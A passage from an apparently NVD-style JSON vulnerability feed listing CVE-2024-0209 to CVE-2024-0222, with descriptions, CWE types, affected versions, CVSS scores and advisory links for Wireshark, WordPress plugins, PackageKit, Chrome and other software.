Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "GVCP dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:4.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.6.0", "versionEndIncluding" : "3.6.19", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.0.0", "versionEndIncluding" : "4.0.11", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-03T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0209", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-476" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19501", "name" : "GitLab Issue #19501", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19501", "name" : "GitLab Issue #19501", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-02.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-02.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-02.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-02.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "IEEE 1609.2 dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:4.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.6.0", "versionEndIncluding" : "3.6.19", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.0.0", "versionEndIncluding" : "4.0.11", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-03T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0210", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-674" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19504", "name" : "GitLab Issue #19504", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19504", "name" : "GitLab Issue #19504", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-04.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-04.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-04.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-04.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Zigbee TLV dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:4.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-03T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0211", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-835" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19557", "name" : "GitLab Issue #19557", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/wireshark/wireshark/-/issues/19557", "name" : "GitLab Issue #19557", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-05.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-05.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://www.wireshark.org/security/wnpa-sec-2024-05.html", "name" : "https://www.wireshark.org/security/wnpa-sec-2024-05.html", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "DOCSIS dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wireshark:wireshark:4.2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-03T08:15Z", "lastModifiedDate" : "2025-05-05T14:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0212", "ASSIGNER" : "cna@cloudflare.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3", "name" : "https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3", "name" : "https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2", "name" : "https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2", "name" : "https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Cloudflare Wordpress plugin was found to be vulnerable to improper authentication. The vulnerability enables attackers with a lower privileged account to access data from the Cloudflare API.\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cloudflare:cloudflare:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.12.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-29T10:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0213", "ASSIGNER" : "trellixpsirt@trellix.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10416", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10416", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10416", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10416", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nA buffer overflow vulnerability in TA for Linux and TA for MacOS prior to 5.8.1 allows a local user to gain elevated permissions, or cause a Denial of Service (DoS), through exploiting a memory corruption issue in the TA service, which runs as root. This may also result in the disabling of event reporting to ePO, caused by failure to validate input from the file correctly. \n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:trellix:agent:*:*:*:*:macos:*:*:*", "versionEndExcluding" : "5.8.1", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:trellix:agent:*:*:*:*:linux:*:*:*", "versionEndExcluding" : "5.8.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-09T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0216", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/google-document-embedder/tags/2.6.4/functions.php#L187", "name" : "https://plugins.trac.wordpress.org/browser/google-document-embedder/tags/2.6.4/functions.php#L187", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/google-document-embedder/tags/2.6.4/functions.php#L187", "name" : "https://plugins.trac.wordpress.org/browser/google-document-embedder/tags/2.6.4/functions.php#L187", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/75e55138-b091-4113-89da-e1ca45fb99ea?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/75e55138-b091-4113-89da-e1ca45fb99ea?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/75e55138-b091-4113-89da-e1ca45fb99ea?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/75e55138-b091-4113-89da-e1ca45fb99ea?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Google Doc Embedder plugin for WordPress is vulnerable to Server Side Request Forgery via the 'gview' shortcode in versions up to, and including, 2.6.4. This can allow authenticated attackers with contributor-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-30T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0217", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0217", "name" : "https://access.redhat.com/security/cve/CVE-2024-0217", "refsource" : "", "tags" : [ "Mitigation", "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0217", "name" : "https://access.redhat.com/security/cve/CVE-2024-0217", "refsource" : "", "tags" : [ "Mitigation", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256624", "name" : "RHBZ#2256624", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2256624", "name" : "RHBZ#2256624", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79", "name" : "https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79", "name" : "https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A use-after-free flaw was found in PackageKitd. In some conditions, the order of cleanup mechanics for a transaction could be impacted. As a result, some memory access could occur on memory regions that were previously freed. Once freed, a memory region can be reused for other allocations and any previously stored data in this memory region is considered lost." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:packagekit_project:packagekit:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "LOW", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-03T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0218", "ASSIGNER" : "prodsec@nozominetworks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://security.nozominetworks.com/NN-2024:1-01", "name" : "https://security.nozominetworks.com/NN-2024:1-01", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.nozominetworks.com/NN-2024:1-01", "name" : "https://security.nozominetworks.com/NN-2024:1-01", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Denial of Service (Dos) vulnerability in Nozomi Networks Guardian, caused by improper input validation in certain fields used in the Radius parsing functionality of our IDS, allows an unauthenticated attacker sending specially crafted malformed network packets to cause the IDS module to stop updating nodes, links, and assets.\n\n\n\nNetwork traffic may not be analyzed until the IDS module is restarted." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-10T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0219", "ASSIGNER" : "security@progress.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability", "name" : "https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability", "name" : "https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.telerik.com/products/decompiler.aspx", "name" : "https://www.telerik.com/products/decompiler.aspx", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.telerik.com/products/decompiler.aspx", "name" : "https://www.telerik.com/products/decompiler.aspx", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Telerik JustDecompile versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik JustDecompile install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:telerik_justdecompile:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2019.1.118.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-31T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0220", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf", "name" : "https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf", "name" : "https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "B&R Automation Studio Upgrade Service and B&R Technology Guarding use insufficient cryptography for communication to the upgrade and the licensing servers. A network-based attacker could exploit the vulnerability to execute arbitrary code on the products or sniff sensitive data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:br-automation:automation_studio:*:*:*:*:*:*:*:*", "versionEndExcluding" : "4.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:br-automation:technology_guarding:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.4.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-22T11:15Z", "lastModifiedDate" : "2025-05-06T17:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0221", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291", "name" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291", "name" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441", "name" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441", "name" : "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.8.20", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-05T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0222", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1501798", "name" : "https://crbug.com/1501798", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://crbug.com/1501798", "name" : "https://crbug.com/1501798", "refsource" : "", "tags" : [ "Permissions Required", "Vendor Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/", "name" : 